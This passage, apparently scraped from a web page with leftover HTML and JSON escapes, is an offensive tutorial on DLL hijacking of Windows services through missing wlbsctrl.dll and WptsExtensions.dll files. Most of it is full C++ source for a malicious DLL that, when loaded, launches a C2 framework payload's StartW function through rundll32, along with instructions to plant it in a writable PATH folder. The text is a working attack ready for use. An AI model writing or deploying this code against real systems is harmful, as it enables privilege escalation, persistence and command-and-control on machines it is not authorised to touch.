A DLL hijack is potentially achievable when a directory within the “standard search order” is writeable by a malicious actor. The attack is exponentially simplified when DLLs are missing on the target system. This occurs in older version of Microsoft Windows (Vista, 7, and 8) with the wlbsctrl.dll. Newer versions of Windows have a similarly predictable issue with the \u201cschedule\u201d service WptsExtensions.dll.<\/p>\n\n\n\n
The IEEXT service attempts to call the “main” function in wlbsctrl.dll. This functionality is not compatible with prevalent C2 framework DLL payloads. A custom DLL is therefore needed to invoke the “StartW” method. Compile a DLL using a modified version of the code snippet below; provide a correct (1) payload location and (2) unique mutex. Upload the malicious DLL in the insecure PATH folder. <\/p>\n\n\n\n
#include <windows.h>\n#include <string>\n#include <iostream>\n#include \"Shlwapi.h\"\n#include \"shlobj.h\"\n#include \"pch.h\"\n\n\nDWORD WINAPI executeProcess(LPVOID lpParam);\nBOOL APIENTRY DllMain(HMODULE hModule,\n\tDWORD ul_reason_for_call,\n\tLPVOID lpReserved\n)\n{\n\tswitch (ul_reason_for_call)\n\t{\n\tcase DLL_PROCESS_ATTACH:\n\t\texecuteProcess(NULL); \/\/When main is called, go to executeProcess\n\t\tbreak;\n\tcase DLL_THREAD_ATTACH:\n\tcase DLL_THREAD_DETACH:\n\tcase DLL_PROCESS_DETACH:\n\t\tbreak;\n\t}\n\treturn TRUE;\n}\n\nDWORD Return1() {\n\treturn 1;\n}\n\n\/\/Spawns a new process\nDWORD WINAPI executeProcess(LPVOID lpParam) {\n\tSTARTUPINFO info = { 0 };\n\tPROCESS_INFORMATION processInfo;\n\n\t\/\/Create a uniquely named mutex. \n\tCreateMutexA(0, FALSE, \"Local\\\\<UNIQUE_NAME><\/em><\/strong>\");\n\tif (GetLastError() == ERROR_ALREADY_EXISTS)\n\t{\n\t\treturn 0;\n\t}\n\telse\n\t{\n\t\t\/\/If using as a .dll hijack only use\/manipulate the following code\n\t\t\n\t\tstd::wstring rundllStart = L\"C:\\\\Windows\\\\System32\\\\rundll32.exe C:\\\\Users\\\\Public\\\\<payload.dll><\/strong><\/em>,StartW\";\n\n\t\t\/\/Spawn the new process\n\t\tBOOL hR = CreateProcess(NULL, (LPWSTR)rundllStart.c_str(), NULL, NULL, TRUE, 0, NULL, NULL, &info, &processInfo);\n\t\tif (hR == 0) {\n\t\t\treturn 1;\n\t\t}\n\t}\n\n\treturn 0;\n}\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"